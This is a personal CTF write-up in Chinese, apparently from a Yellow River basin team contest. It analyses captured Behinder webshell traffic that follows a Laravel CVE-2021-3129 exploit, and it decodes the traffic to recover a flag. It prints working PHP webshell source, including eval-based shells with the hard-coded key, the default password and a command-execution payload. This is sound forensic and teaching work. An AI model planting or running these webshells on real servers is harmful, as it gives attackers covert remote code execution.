第二届黄河流域团队赛
个人wp
web
两个题都几乎是网上的原题,不想多说了,放个链接,重点记录一下自己第一次遇到的misc 冰蝎流量分析
web1 https://blog.csdn.net/qq_51768842/article/details/125153850
web2 https://blog.csdn.net/m0_73512445/article/details/135266070
web2后面用不到反弹shell,js原型链污染即可
misc
LL
一开始看到很多目录扫描产生的404流量,先用显示过滤器把它们过滤掉(这样筛完看到的基本只有响应包,因为请求包没有 http.response.code 字段,分析时要再回头对照对应的请求),命令
http && http.response.code != 404
过滤后,找最后的200的流量包,发现都是加密的密文,于是再往前寻找,发现有几个流量包值得注意
这个请求一看就是在读取什么文件,似乎是文件包含,而且有好几个包都是这样,感觉有蹊跷。上网搜了一下Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution,发现这几个payload利用的是php laravel框架的一个漏洞:CVE-2021-3129,大佬的文章:https://www.cnblogs.com/xiaoyunxiaogang/p/16913350.html
poc大多都要利用filter写入日志,而且payload会用quoted-printable编码一下,于是寻找带有quoted-printable编码字符串的流量包,找一下跟/_ignition/execute-solution交互的流量包,过滤条件
http.request.uri contains "/_ignition/execute-solution"
在6787这个流量包中找到了
按照上一个图中,filter的编码顺序,对应解码一下,ai写的脚本
<?php
// Paste the long captured payload string here.
$string="...";

// Stage the payload in an in-memory stream so that stream filters can be chained on it.
$stream = fopen("php://memory", "r+");
fwrite($stream, $string);
rewind($stream);

// Attach the decoding filters one after another. The order matters and follows the
// filter chain observed in the captured request: quoted-printable decode first, then
// UTF-16LE -> UTF-8 conversion, then base64 decode.
foreach (['convert.quoted-printable-decode', 'convert.iconv.utf-16le.utf-8', 'convert.base64-decode'] as $filterName) {
    stream_filter_append($stream, $filterName);
}

// Drain the stream in 8 KiB chunks and print the decoded text.
// The output is attacker-supplied content: inspect it as data, never execute or include it.
while (!feof($stream)) {
    echo fread($stream, 8192);
}

// Release the in-memory stream.
fclose($stream);
?>
发现
中间这里有很多base64,还写入了about.php,看看是什么东西,base64解码完
<?php
// Analyst note (captured sample): the write-up recovered this by base64-decoding data found in
// the decoded payload, which it says was written to about.php. Kept verbatim as evidence.
//
// What the visible text does:
//   - silences PHP error reporting and starts a session;
//   - stores a hard-coded 16-character key in $key;
//   - (text after the "//" below) copies the key into $_SESSION['k'], reads the raw request
//     body from php://input, then either base64-decodes it and XORs each byte with
//     $key[($i+1) & 15] when the openssl extension is not loaded, or calls openssl_decrypt()
//     with "AES128" and the key;
//   - splits the plaintext on '|' and hands the second field to eval() through an invokable
//     class called via call_user_func().
//
// NOTE(review): as rendered here, everything after "//" on the long line is syntactically part
// of that comment; the original file presumably had line breaks there.
//
// Detection-relevant markers visible in this sample: the literal key string, eval() on
// request-derived data, and the string-concatenated function name "base64_"."decode".
@error_reporting(0);
session_start();$key="e45e329feb5d925b"; //This key is the first 16 characters of the 32-character MD5 of the connection password; the default connection password is rebeyond$_SESSION['k']=$key;session_write_close();$post=file_get_contents("php://input");if(!extension_loaded('openssl')){$t="base64_"."decode";$post=$t($post."");for($i=0;$i<strlen($post);$i++) {$post[$i] = $post[$i]^$key[$i+1&15]; }}else{$post=openssl_decrypt($post, "AES128", $key);}$arr=explode('|',$post);$func=$arr[0];$params=$arr[1];class C{public function __invoke($p) {eval($p."");}}@call_user_func(new C(),$params);
?>
还真是webshell,命令的流量都会经过加密,上网查了一下发现这是冰蝎的webshell,那么最后一个流量包里的很简短的应答应该就是flag
虽然这里写了aes密钥,但拿去在线的aes解密还是不太对(webshell里有两条分支:没有加载openssl扩展时走base64加异或,否则才走AES128;在线工具对不上,可能是实际流量走的是异或分支,也可能是模式、IV等参数与工具默认值不一致),还是得从这个webshell本身的解密方式来,稍微改一下拿来解密即可
选最后的流量包中加密的命令解密
还要base64解码,
// Analyst note (captured sample): decrypted request payload from the capture, kept verbatim.
//
// main($content): builds a result array whose "status" is base64("success") and whose "msg"
// is base64($content). The text after the "//" inside main() (session comment plus the echo of
// encrypt(json_encode($result))) is, as rendered here, syntactically part of that comment;
// the original presumably had a line break before "echo".
//
// encrypt($data): takes the key from $_SESSION['k']. When the openssl extension is not
// loaded it XORs each byte of $data with $key[($i+1) & 15] and returns the result;
// otherwise it returns openssl_encrypt($data, "AES128", $key).
@error_reporting(0);
function main($content)
{$result = array();$result["status"] = base64_encode("success");$result["msg"] = base64_encode($content);@session_start(); //Initialize the session so that going straight to background after connect does not leave a later getresult unable to get the cookieecho encrypt(json_encode($result));
}function encrypt($data)
{@session_start();$key = $_SESSION['k'];if(!extension_loaded('openssl')){for($i=0;$i<strlen($data);$i++) {$data[$i] = $data[$i]^$key[$i+1&15];}return $data;}else{return openssl_encrypt($data, "AES128", $key);}
}
// Analyst note (captured sample): $content is an opaque base64 blob carried by the decrypted
// request. It is base64-decoded here and handed to main(); its decoded value is not
// interpreted in this listing.
$content="cW1sdXE4bDlLcXpMV21aZm9WUXVkQU82N0NSTmF6c0xGeWZESzg3SUhIemhXMEdqWlRIRzNmSDVPYjVISUdBVmFoUVNnZlQ1RkxUU1JXWFF2aUhnZ1hCeVpueXpVeWhuSFJKcm9yODdEaGZtazRyc3ZxRG53bE1OZFVDaDRic0ZwSndHUTFsdGZmWURITnN4eEtXM2djeFJhbWx2NXFRVlZmNXNnMENaZHI2ZWZJdkVPY21xN1VvSGhuNWczUFJ0ZUJSNEE0NlE2djNYbTVMWXN5cHdoM3NQZUJFWGhpaVBSWEprb09wSFJRR3hlcEttQXRrT2hmcW1lVDRreHBHenh2VmNwalA2THVXODlYWnRRUU44MzNHSGRyd2pNTEFkYlFSTVZ5RFk3ZlhhaktLeFhkV0UyOXZoQ0Rvb2FVSGp5a29LNUc2eXBWdlJGVkY4dDVuNUlLZHNscEFaemVzUmR6QjNFNnRqUGNYYlRReHg0Mm1Sd1phUGMxOWhud1MyUzVLOTRYMmJRYjFkbUliYWpHWEdBSFRoY2o1YUl4QzdmWXZ2YUxSVkxSbmV4RmNOckF1MWFieGUwdzhPMFpza3JXVER2WHpTeFlpZzBwTXNEVU5POGtnakhzZzAxU1lNQVc4cE5pWENnN3RWaUVKazQ1MHJJRVpXS3IzNjMwekQyRTZNdTRFZWIyc2hoSXFvQjQxSHMwZHlFZ2Q3UlV6NjVlMDA2S3NpdzBwQVZVQVQ5VWVPSUw0a21lRmR6WlpVVTFIN0pNUHZoM3ZiYXdxUlBLbTBTTmxiQTN2Z2k3Z2cxR1BWdVljZXRrQ2lVNUlYS1N0RW1sVXNTT3RLWWNnSXdUTWY0eDR5WTBLMjRFT0txRlI0QzE5WEJaczl2dFUxMlBPTDdZZDZTaXc3VTRIbzFqaGFrN0FpQWllZXlPS3FVNHNYSzVMeXFERFhsY2dtOHM0cDVhSjBJQXZTaGpXeGptck8yTVpWeDNyend1blRyR3lGM2pZUmhUZTE2eXRMVUdMRXZMY3MwNTJsaHBjalBPbkE3aUdOZThTMzNzT3hhaWtuRXFDblVEWG42UWlob2czRzduRTZZOGpnN25FRk9YSmJqOVcyNzNnNVRIOEM4WEI1dW9kbnN2dEtOeTNNVDh0UGloUmdOTjh5MXg4aTBpYVEyY2R4QWhIb1JBUjFpSEFNTzdKVjNSVmlyYWhZbzZTT1g0cUxQOVNrRk1teXpjeXI3Rkt0dlN0eDNwa3ZnOFB6YnFLdGpUaXZUWWVndEl2Y0tJeGE3NHY4VktsalhDUW4zRzZVWnozenJEWEV1dE1ibHAzVDBQRUw2bDZyYU5QbzI3SGhDWm1hU2o2Qm5YNGVTVVVMYWJHV1RDRUlBWk8yTWp1bWxMRGJqY252QUF6QXg3ckRBR05rNG9LZnVRZmt6bUJhZlYyRXVmRDN5YUpxTTN2TDZ6d0JzQnVwMGN3SFN4a0tLVTJ2aW5oQWNUMXJsa3NRQTIzMzZHVjZBYWZ0NE1GTUo2czJLYVphVklIN3BJUWZWUDVoeThJYTF3MDZMV3c3d0p3amlCRlc1VjU2bzljZ3IyNkwxOERxaHdZVTB0WHVFdmFacnRBdlVDUHFmOHZPU2JjMUxleU5HZ0V0TzZyTkFxRWZSRmJmSmpqdGtUSGdacWdKU1pXVXBVUFRmUW9MMHhua1NjejNWV2Q0emxnakpjRmFLUU9ZS1h3am1WWGY1d1FYNlpTT1B3UjZuZmpqWVZ6bTBPazNlaDBtQm1GRkhyVmhUQ0E2T2xsR1dZVkdJVHV4d3UxdGU=";$content=base64_decode($content);
main($content);
冰蝎真是喜欢套娃,继续base64,
<?php
// Analyst note (captured sample): decrypted command-execution payload from the capture, kept
// verbatim as evidence. As rendered here, function boundaries are fused onto shared lines.
//
// getSafeStr($str): converts $str from UTF-8 to GBK and back with iconv (//IGNORE); if the
// round trip loosely equals the input it returns that, otherwise it treats the input as GBK
// and returns it converted to UTF-8.
//
// main($cmd, $path): removes execution time limits, reads the disable_functions ini value into
// a list, and appends " 2>&1\n" to the command when PHP_OS contains "win". It then tries
// system, proc_open, passthru, shell_exec, exec and popen in that order, using the first one
// that is callable and not listed in disable_functions, and captures the output. The output is
// passed through getSafeStr(), base64-encoded into a status/msg array, JSON-encoded, and echoed
// through encrypt(). If none is usable it echoes an encrypted "fail" result and returns.
// $path is accepted but not referenced in the visible body.
// NOTE(review): 'is_callable' and 'in_array' are invoked through string variables, and locals
// have randomised-looking names — presumably obfuscation; both are useful matching features.
//
// encrypt($data): XORs each byte with $key[($i + 1) & 15] when the openssl extension is not
// loaded, otherwise returns openssl_encrypt($data, "AES128", $key); the key is $_SESSION['k'].
//
// Trailer: $cmd and $path are base64 literals that are decoded and passed to main().
@error_reporting(0);function getSafeStr($str) {$s1 = iconv('utf-8', 'gbk//IGNORE', $str);$s0 = iconv('gbk', 'utf-8//IGNORE', $s1);if ($s0 == $str) {return $s0;} else {return iconv('gbk', 'utf-8//IGNORE', $str);}
}function main($cmd, $path) {@set_time_limit(0);@ignore_user_abort(1);@ini_set('max_execution_time', 0);$result = array();$PadtJn = @ini_get('disable_functions');if (!empty($PadtJn)) {$PadtJn = preg_replace('/[, ]+/', ',', $PadtJn);$PadtJn = explode(',', $PadtJn);$PadtJn = array_map('trim', $PadtJn);} else {$PadtJn = array();}$c = $cmd;if (FALSE !== strpos(strtolower(PHP_OS), 'win')) {$c = $c . " 2>&1\n";}$JueQDBH = 'is_callable';$Bvce = 'in_array';if ($JueQDBH('system') && !$Bvce('system', $PadtJn)) {ob_start();system($c);$kWJW = ob_get_contents();ob_end_clean();} else if ($JueQDBH('proc_open') && !$Bvce('proc_open', $PadtJn)) {$handle = proc_open($c, array(array('pipe', 'r'),array('pipe', 'w'),array('pipe', 'w')), $pipes);$kWJW = NULL;while (!feof($pipes[1])) {$kWJW .= fread($pipes[1], 1024);}@proc_close($handle);} else if ($JueQDBH('passthru') && !$Bvce('passthru', $PadtJn)) {ob_start();passthru($c);$kWJW = ob_get_contents();ob_end_clean();} else if ($JueQDBH('shell_exec') && !$Bvce('shell_exec', $PadtJn)) {$kWJW = shell_exec($c);} else if ($JueQDBH('exec') && !$Bvce('exec', $PadtJn)) {$kWJW = array();exec($c, $kWJW);$kWJW = join(chr(10), $kWJW) . chr(10);} else if ($JueQDBH('popen') && !$Bvce('popen', $PadtJn)) {$fp = popen($c, 'r');$kWJW = NULL;if (is_resource($fp)) {while (!feof($fp)) {$kWJW .= fread($fp, 1024);}}@pclose($fp);} else {$kWJW = 0;$result["status"] = base64_encode("fail");$result["msg"] = base64_encode("none of proc_open/passthru/shell_exec/exec/popen is available");$key = $_SESSION['k'];echo encrypt(json_encode($result));return;}$result["status"] = base64_encode("success");$result["msg"] = base64_encode(getSafeStr($kWJW));echo encrypt(json_encode($result));
}function encrypt($data) {@session_start();$key = $_SESSION['k'];if (!extension_loaded('openssl')) {for ($i = 0; $i < strlen($data); $i++) {$data[$i] = $data[$i] ^ $key[$i + 1 & 15];}return $data;} else {return openssl_encrypt($data, "AES128", $key);}
}$cmd = "Y2QgL2QgIkQ6XHBocHN0dWR5X3Byb1xXV1dcbGFyYXZlbFwiJnR5cGUgZmxhZy50eHQ=";
$cmd = base64_decode($cmd);
$path = "RDovcGhwc3R1ZHlfcHJvL1dXVy9sYXJhdmVsLw==";
$path = base64_decode($path);
main($cmd, $path);
?>
完整的webshell浮出水面,解密一下命令
cd /d "D:\phpstudy_pro\WWW\laravel\"&type flag.txt
还真是在查看flag,观察main函数可知,命令的结果就是被一开始那个加密方式加密的,直接解密
上网找资料时发现,还可以用puzzlesolver工具跑解密,需要冰蝎连接的密码,把密码rebeyond加入puzzlesolver的字典即可
puzzlesolver真乃神器
下面是冰蝎4.0版本的webshell(解密部分是base64解码后再按密钥逐字节异或),以后解题要先确认版本
<?php
// Analyst note (reference sample): the write-up identifies this as the version 4.0 webshell.
// Kept verbatim. Detection-relevant markers visible here: the literal key string, the
// string-concatenated function name "base64_"."decode", and eval() on the request body.
@error_reporting(0);
// Decrypt($data): base64-decodes $data, then XORs byte $i with $key[($i+1) & 15]
// ("+" binds tighter than "&" in PHP, so the index is ($i+1)&15) and returns the result.
// The key is hard-coded in the function body.
function Decrypt($data)
{$key="e45e329feb5d925b"; $bs="base64_"."decode";$after=$bs($data."");for($i=0;$i<strlen($after);$i++) {$after[$i] = $after[$i]^$key[$i+1&15]; }return $after;
}
// Reads the raw request body from php://input, decrypts it with Decrypt(), and evaluates the
// plaintext as PHP.
$post=Decrypt(file_get_contents("php://input"));
eval($post);
?>